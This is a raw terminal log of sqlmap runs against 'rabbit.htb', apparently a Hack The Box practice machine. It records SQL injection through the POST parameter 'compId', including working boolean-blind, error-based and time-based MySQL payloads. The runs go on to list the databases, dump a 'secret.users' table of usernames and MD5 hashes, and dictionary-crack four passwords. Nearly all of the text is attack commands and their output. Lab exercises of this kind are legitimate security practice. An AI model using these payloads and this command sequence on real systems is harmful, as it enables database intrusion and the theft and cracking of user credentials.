# sqlmap -r complain_post.txt --dbms=mysql -p "compId" --risk=3 --level=3 --batch
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.9#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:53:48 /2019-09-23/

[00:53:48] [INFO] parsing HTTP request from 'complain_post.txt'
[00:53:48] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://rabbit.htb:8080/complain/view.php?mod=admin&view=compDetails'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[00:53:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[00:53:49] [INFO] testing if the target URL content is stable
[00:53:49] [INFO] heuristic (basic) test shows that POST parameter 'compId' might be injectable (possible DBMS: 'MySQL')
[00:53:49] [INFO] testing for SQL injection on POST parameter 'compId'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) value? [Y/n] Y
[00:53:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:53:50] [WARNING] reflective value(s) found and filtering out
[00:53:55] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[00:54:01] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[00:54:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[00:54:19] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[00:54:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[00:54:25] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[00:54:27] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[00:54:27] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[00:54:28] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[00:54:28] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[00:54:30] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[00:54:30] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[00:54:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[00:54:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[00:54:43] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[00:54:47] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[00:54:49] [INFO] POST parameter 'compId' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable 
[00:54:49] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[00:54:49] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[00:54:49] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[00:54:49] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[00:54:49] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[00:54:49] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[00:54:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[00:54:49] [INFO] POST parameter 'compId' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[00:54:49] [INFO] testing 'MySQL inline queries'
[00:54:49] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[00:54:50] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:54:50] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[00:54:50] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[00:54:50] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[00:54:50] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[00:54:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[00:55:01] [INFO] POST parameter 'compId' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[00:55:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:55:01] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[00:55:03] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[00:55:04] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[00:55:06] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[00:55:08] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[00:55:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:55:11] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[00:55:13] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[00:55:14] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[00:55:15] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[00:55:17] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[00:55:18] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[00:55:20] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[00:55:21] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[00:55:23] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
POST parameter 'compId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 715 HTTP(s) requests:
---
Parameter: compId (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: compId=9 RLIKE (SELECT (CASE WHEN (5198=5198) THEN 9 ELSE 0x28 END))&compDesc=hello,

my setup box is not working well. please assist.

Thanks&engId=6&btnLogin= Assing Complain 

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: compId=9 AND (SELECT 2302 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(2302=2302,1))),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&compDesc=hello,

my setup box is not working well. please assist.

Thanks&engId=6&btnLogin= Assing Complain 

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: compId=9 AND (SELECT 9021 FROM (SELECT(SLEEP(5)))MgzQ)&compDesc=hello,

my setup box is not working well. please assist.

Thanks&engId=6&btnLogin= Assing Complain
---
[00:55:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.31, Apache 2.4.27
back-end DBMS: MySQL >= 5.0
[00:55:25] [INFO] fetched data logged to text files under '/root/.sqlmap/output/rabbit.htb'

[*] ending @ 00:55:25 /2019-09-23/

root@kali:~/YoloToolbox/machines/htb/rabbit# 
root@kali:~/YoloToolbox/machines/htb/rabbit



root@kali:~/YoloToolbox/machines/htb/rabbit# sqlmap -r complain_post.txt --dbms=mysql -p "compId" --risk=3 --level=3 --batch --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.9#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:57:07 /2019-09-23/

[00:57:07] [INFO] parsing HTTP request from 'complain_post.txt'
[00:57:07] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://rabbit.htb:8080/complain/view.php?mod=admin&view=compDetails'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: compId (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: compId=9 RLIKE (SELECT (CASE WHEN (5198=5198) THEN 9 ELSE 0x28 END))&compDesc=hello,

my setup box is not working well. please assist.

Thanks&engId=6&btnLogin= Assing Complain 

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: compId=9 AND (SELECT 2302 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(2302=2302,1))),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&compDesc=hello,

my setup box is not working well. please assist.

Thanks&engId=6&btnLogin= Assing Complain 

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: compId=9 AND (SELECT 9021 FROM (SELECT(SLEEP(5)))MgzQ)&compDesc=hello,

my setup box is not working well. please assist.

Thanks&engId=6&btnLogin= Assing Complain
---
[00:57:08] [INFO] testing MySQL
[00:57:08] [INFO] confirming MySQL
[00:57:09] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.31, Apache 2.4.27
back-end DBMS: MySQL >= 5.0.0
[00:57:09] [INFO] fetching database names
[00:57:09] [INFO] used SQL query returns 7 entries
[00:57:09] [INFO] retrieved: 'information_schema'
[00:57:09] [INFO] retrieved: 'complain'
[00:57:09] [INFO] retrieved: 'joomla'
[00:57:09] [INFO] retrieved: 'mysql'
[00:57:09] [INFO] retrieved: 'performance_schema'
[00:57:09] [INFO] retrieved: 'secret'
[00:57:09] [INFO] retrieved: 'sys'
available databases [7]:
[*] complain
[*] information_schema
[*] joomla
[*] mysql
[*] performance_schema
[*] secret
[*] sys

[00:57:09] [INFO] fetched data logged to text files under '/root/.sqlmap/output/rabbit.htb'

[*] ending @ 00:57:09 /2019-09-23/

root@kali:~/YoloToolbox/machines/htb/rabbit# sqlmap -r complain_post.txt --dbms=mysql -p "compId" --risk=3 --level=3 --batch -D secret --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.3.9#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:57:36 /2019-09-23/

[00:57:36] [INFO] parsing HTTP request from 'complain_post.txt'
[00:57:36] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://rabbit.htb:8080/complain/view.php?mod=admin&view=compDetails'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: compId (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: compId=9 RLIKE (SELECT (CASE WHEN (5198=5198) THEN 9 ELSE 0x28 END))&compDesc=hello,

my setup box is not working well. please assist.

Thanks&engId=6&btnLogin= Assing Complain 

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: compId=9 AND (SELECT 2302 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(2302=2302,1))),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&compDesc=hello,

my setup box is not working well. please assist.

Thanks&engId=6&btnLogin= Assing Complain 

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: compId=9 AND (SELECT 9021 FROM (SELECT(SLEEP(5)))MgzQ)&compDesc=hello,

my setup box is not working well. please assist.

Thanks&engId=6&btnLogin= Assing Complain
---
[00:57:37] [INFO] testing MySQL
[00:57:37] [INFO] confirming MySQL
[00:57:37] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.31, Apache 2.4.27
back-end DBMS: MySQL >= 5.0.0
[00:57:37] [INFO] fetching tables for database: 'secret'
[00:57:37] [INFO] used SQL query returns 1 entry
[00:57:37] [INFO] retrieved: 'users'
[00:57:37] [INFO] fetching columns for table 'users' in database 'secret'
[00:57:37] [INFO] used SQL query returns 2 entries
[00:57:37] [INFO] retrieved: 'Username'
[00:57:38] [INFO] retrieved: 'text'
[00:57:38] [INFO] retrieved: 'Password'
[00:57:38] [INFO] retrieved: 'text'
[00:57:38] [INFO] fetching entries for table 'users' in database 'secret'
[00:57:38] [INFO] used SQL query returns 10 entries
[00:57:38] [INFO] retrieved: '13fa8abd10eed98d89fd6fc678afaf94'
[00:57:38] [INFO] retrieved: 'Zephon'
[00:57:38] [INFO] retrieved: '33903fbcc0b1046a09edfaa0a65e8f8c'
[00:57:38] [INFO] retrieved: 'Kain'
[00:57:38] [INFO] retrieved: '33da7a40473c1637f1a2e142f4925194'
[00:57:38] [INFO] retrieved: 'Dumah'
[00:57:38] [INFO] retrieved: '370fc3559c9f0bff80543f2e1151c537'
[00:57:38] [INFO] retrieved: 'Magnus'
[00:57:39] [INFO] retrieved: '719da165a626b4cf23b626896c213b84'
[00:57:39] [INFO] retrieved: 'Raziel'
[00:57:39] [INFO] retrieved: 'a6f30815a43f38ec6de95b9a9d74da37'
[00:57:39] [INFO] retrieved: 'Moebius'
[00:57:39] [INFO] retrieved: 'b9c2538d92362e0e18e52d0ee9ca0c6f'
[00:57:39] [INFO] retrieved: 'Ariel'
[00:57:39] [INFO] retrieved: 'd322dc36451587ea2994c84c9d9717a1'
[00:57:39] [INFO] retrieved: 'Turel'
[00:57:39] [INFO] retrieved: 'd459f76a5eeeed0eca8ab4476c144ac4'
[00:57:39] [INFO] retrieved: 'Dimitri'
[00:57:39] [INFO] retrieved: 'dea56e47f1c62c30b83b70eb281a6c39'
[00:57:39] [INFO] retrieved: 'Malek'
[00:57:39] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[00:57:39] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[00:57:39] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[00:57:39] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[00:57:39] [INFO] starting 4 processes 
[00:57:44] [INFO] cracked password 'barcelona' for user 'Malek'                                                                                                       
[00:57:53] [INFO] cracked password 'santiago' for user 'Moebius'                                                                                                      
[00:57:53] [INFO] cracked password 'popcorn' for user 'Dumah'                                                                                                         
[00:57:56] [INFO] cracked password 'pussycatdolls' for user 'Ariel'                                                                                                   
Database: secret                                                                                                                                                      
Table: users
[10 entries]
+----------+--------------------------------------------------+
| Username | Password                                         |
+----------+--------------------------------------------------+
| Zephon   | 13fa8abd10eed98d89fd6fc678afaf94                 |
| Kain     | 33903fbcc0b1046a09edfaa0a65e8f8c                 |
| Dumah    | 33da7a40473c1637f1a2e142f4925194 (popcorn)       |
| Magnus   | 370fc3559c9f0bff80543f2e1151c537                 |
| Raziel   | 719da165a626b4cf23b626896c213b84                 |
| Moebius  | a6f30815a43f38ec6de95b9a9d74da37 (santiago)      |
| Ariel    | b9c2538d92362e0e18e52d0ee9ca0c6f (pussycatdolls) |
| Turel    | d322dc36451587ea2994c84c9d9717a1                 |
| Dimitri  | d459f76a5eeeed0eca8ab4476c144ac4                 |
| Malek    | dea56e47f1c62c30b83b70eb281a6c39 (barcelona)     |
+----------+--------------------------------------------------+

[00:58:01] [INFO] table 'secret.users' dumped to CSV file '/root/.sqlmap/output/rabbit.htb/dump/secret/users.csv'
[00:58:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/rabbit.htb'

[*] ending @ 00:58:01 /2019-09-23/
